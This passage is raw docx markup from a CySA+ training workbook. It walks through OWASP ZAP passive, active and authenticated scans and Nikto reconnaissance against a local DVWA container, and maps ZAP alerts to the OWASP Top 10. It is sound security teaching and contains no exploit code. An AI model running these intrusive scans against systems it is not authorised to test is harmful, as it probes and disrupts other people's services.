        <w:t>Step 3 — Run a ZAP baseline scan (passive, fast)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>zap-baseline.py -t http://127.0.0.1:8080 -r /tmp/zap_baseline.html || true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls -lh /tmp/zap_baseline.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A baseline scan only observes traffic — it will not break the app. Look for:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WARN-NEW rows — newly discovered issues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Missing security headers (CSP, X-Frame-Options, HSTS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cookies without Secure/HttpOnly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Run a full active scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>zap-full-scan.py -t http://127.0.0.1:8080 -r /tmp/zap_full.html || true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The full scan actively injects payloads and is what you would run in a staging environment. Open /tmp/zap_full.html (download via Killercoda) — you should see DVWA's intentional XSS, SQLi, and command-injection flaws flagged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Map ZAP alerts to OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Major ZAP alert classes:</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fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ZAP alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>OWASP Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CySA+ 2.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A03 Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Injection flaws</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cross-Site Scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A03 Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>XSS (Reflected/Persistent)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path Traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A01 Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Directory traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A01 Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cross-site request forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Vulnerable JS lib</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A06 Vulnerable Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>End-of-life/outdated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Server misconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A05 Security Misconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Security misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Authenticated scan (deep coverage)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ZAP can log in for you and crawl behind auth. From the ZAP desktop GUI (or -z configs in CLI) you set:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A context with the login URL and form fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A user with creds admin / password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A logged-in / logged-out indicator regex</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Authenticated scans typically find 3–5× more issues than anonymous scans.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Save evidence and tear down</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sha256sum /tmp/zap_full.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docker stop dvwa &amp;&amp; docker rm dvwa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Always hash report files; they become evidence for the remediation team and auditors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run a passive and an active OWASP ZAP scan against DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Read ZAP HTML reports and map findings to OWASP Top 10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The difference between baseline (safe) and full (intrusive) scans.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How authenticated scans surface deeper findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to run a passive and an active OWASP ZAP scan against DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 14 — Web Recon with Nikto and Burp Suite</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perform web-server reconnaissance with Nikto and intercept/replay requests with Burp Suite Community.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will perform web-server reconnaissance with Nikto and intercept/replay requests with Burp Suite Community. Together they cover CySA+ 2.2 (Web application scanners — Burp Suite, Nikto) and reinforce 2.4 (Recommended controls).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run Nikto in the Killercoda playground; run Burp Suite Community on your own laptop.</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 Local (Burp Suite Community)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install Nikto and start a target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y nikto docker.io</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>systemctl start docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docker run -d --name dvwa -p 8080:80 vulnerables/web-dvwa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sleep 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Run a Nikto scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nikto -h http://127.0.0.1:8080 -o /tmp/nikto.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head -40 /tmp/nikto.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Typical Nikto findings on DVWA:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Outdated Apache version (CVE links)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Backup files left in webroot (config.bak)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Server signature disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>TRACE method enabled (XST risk)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Default admin interfaces (/phpmyadmin/)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Tune Nikto with plugins and tuning options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nikto -h http://127.0.0.1:8080 -Tuning 4 -Plugins "headers"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nikto -List-plugins | head -20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-Tuning numbers from the man page:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1: Interesting files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4: Injection (XSS, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
